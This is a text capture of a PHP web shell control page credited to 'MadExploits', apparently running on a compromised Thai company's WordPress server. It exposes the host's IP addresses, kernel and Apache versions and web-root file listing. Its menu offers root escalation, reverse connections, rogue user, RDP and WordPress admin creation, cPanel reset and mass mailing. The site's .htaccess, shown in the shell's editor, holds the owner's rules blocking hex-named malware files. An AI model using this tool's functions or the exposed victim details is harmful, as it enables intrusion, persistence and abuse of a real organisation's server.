Linux 45-56-67-123 5.14.0-503.16.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Dec 13 01:47:05 EST 2024 x86_64
Apache/2.4.62 (AlmaLinux) OpenSSL/3.2.2
: 45.56.67.123 | : 52.15.253.72
Cant Read [ /etc/named.conf ]
8.3.15
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
website2024 /
highcontrol.co.th /
[ HOME SHELL ]
Name
Size
Permission
Action
wp-admin
[ DIR ]
drwxr-xr-x
wp-content
[ DIR ]
drwxr-xr-x
wp-includes
[ DIR ]
drwxr-xr-x
.htaccess
1.96
KB
-rwxr-xr-x
clamscan.log
3.19
MB
-rw-r--r--
index.php
405
B
-rw-r--r--
license.txt
19.45
KB
-rw-r--r--
readme.html
7.24
KB
-rw-r--r--
wp-activate.php
7.21
KB
-rw-r--r--
wp-blog-header.php
351
B
-rw-r--r--
wp-comments-post.php
2.27
KB
-rw-r--r--
wp-config-sample.php
3.26
KB
-rw-r--r--
wp-config.php
3.54
KB
-rwxr-xr-x
wp-cron.php
5.49
KB
-rw-r--r--
wp-links-opml.php
2.44
KB
-rw-r--r--
wp-load.php
3.84
KB
-rw-r--r--
wp-login.php
50.16
KB
-rw-r--r--
wp-mail.php
8.34
KB
-rw-r--r--
wp-settings.php
28.35
KB
-rw-r--r--
wp-signup.php
33.58
KB
-rw-r--r--
wp-trackback.php
4.98
KB
-rw-r--r--
xmlrpc.php
3.17
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : .htaccess
<IfModule mod_rewrite.c> RewriteEngine On RewriteBase / # Redirect www ไป non-www RewriteCond %{HTTP_HOST} ^www\.highcontrol\.co\.th [NC] RewriteRule ^(.*)$ https://highcontrol.co.th%{REQUEST_URI} [R=301,L] # ส่งกลับหน้าแรกเมื่อเข้าถึงโฟลเดอร์ /wp-content/ หรือ /wp-includes/ # ยกเว้นไฟล์ที่ลงท้ายด้วย .js หรือ .css RewriteCond %{REQUEST_URI} ^/wp-content/ [OR] RewriteCond %{REQUEST_URI} ^/wp-admin/css/ [OR] RewriteCond %{REQUEST_URI} ^/wp-admin/images/ [OR] RewriteCond %{REQUEST_URI} ^/wp-admin/includes/ [OR] RewriteCond %{REQUEST_URI} ^/wp-admin/js/ [OR] RewriteCond %{REQUEST_URI} ^/wp-admin/maint/ [OR] RewriteCond %{REQUEST_URI} ^/wp-admin/network/ [OR] RewriteCond %{REQUEST_URI} ^/wp-admin/user/ [OR] RewriteCond %{REQUEST_URI} ^/wp-includes/ RewriteCond %{REQUEST_URI} !\.(js|css|jpg|jpeg|png|gif|webp)$ RewriteRule ^(.*)$ / [R=302,L] RewriteCond %{QUERY_STRING} (^|&)post_type= [NC] RewriteRule ^$ https://www.highcontrol.co.th/ [R=301,L] RewriteRule ^index.php$ - [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . index.php [L] </IfModule> # END WordPress # บล็อกไฟล์ PHP ทั้งหมด <FilesMatch "^[a-f0-9]{8}\.php$"> Order Allow,Deny Deny from all </FilesMatch> # บล็อกไฟล์ CSS ที่มีชื่อเป็นตัวเลข hex 8 หลัก <FilesMatch ".*/[a-f0-9]{8}\.css"> Order Allow,Deny Deny from all </FilesMatch> # บล็อกไฟล์ที่มีนามสกุล ".ccss" <FilesMatch "\.ccss$"> Order Allow,Deny Deny from all </FilesMatch> <IfModule mod_deflate.c> AddOutputFilterByType DEFLATE text/html text/plain text/xml text/css text/javascript application/javascript application/json application/xml application/xhtml+xml application/rss+xml application/atom+xml image/svg+xml </IfModule>
Close